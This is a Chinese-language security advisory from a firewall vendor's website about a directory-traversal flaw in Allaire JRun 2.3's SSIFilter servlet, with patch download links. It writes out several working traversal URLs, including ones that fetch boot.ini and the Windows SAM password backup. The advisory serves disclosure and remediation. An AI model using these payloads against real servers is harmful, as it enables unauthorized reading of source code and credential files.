关于冰盾 | 使用条款 | 网站地图
 
Allaire JRUN 2.3 查看任意文件漏洞
Allaire JRUN 2.3 查看任意文件漏洞
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-12-03
 
涉及程序: 
JRUN

描述: 
Allaire JRUN 2.3 查看任意文件漏洞

详细: 
Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。
JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用URL前缀"/servlet/"调用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 URLs :

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t 
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. 
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. 
./../../../../winnt/repair/sam._ 
http://jrun:8000/servlet/ssifilter/../../test.jsp 
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假设JRun在主机“ jrun ”上运行,端口8000。

受影响的系统:
Allaire JRun 2.3.x

解决方案: 
下载并安装补丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar

 

 
最新内容:
Allair JRUN 非法读取 WEB-INF 漏洞[2014-12-03]
PHP4.3.10以下版本出现严重漏洞[2014-12-03]
Mysql低版本存在的远程访问漏洞[2014-12-03]
防止SQL注入的函数。[2014-12-03]
SQL注入网站入侵实例[2014-12-03]
NTP DDoS攻击激增 而SYN洪水攻击更具破环性[2014-12-02]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2014 冰盾防火墙  www.BingDun.com 法律声明
总机:(010)51661195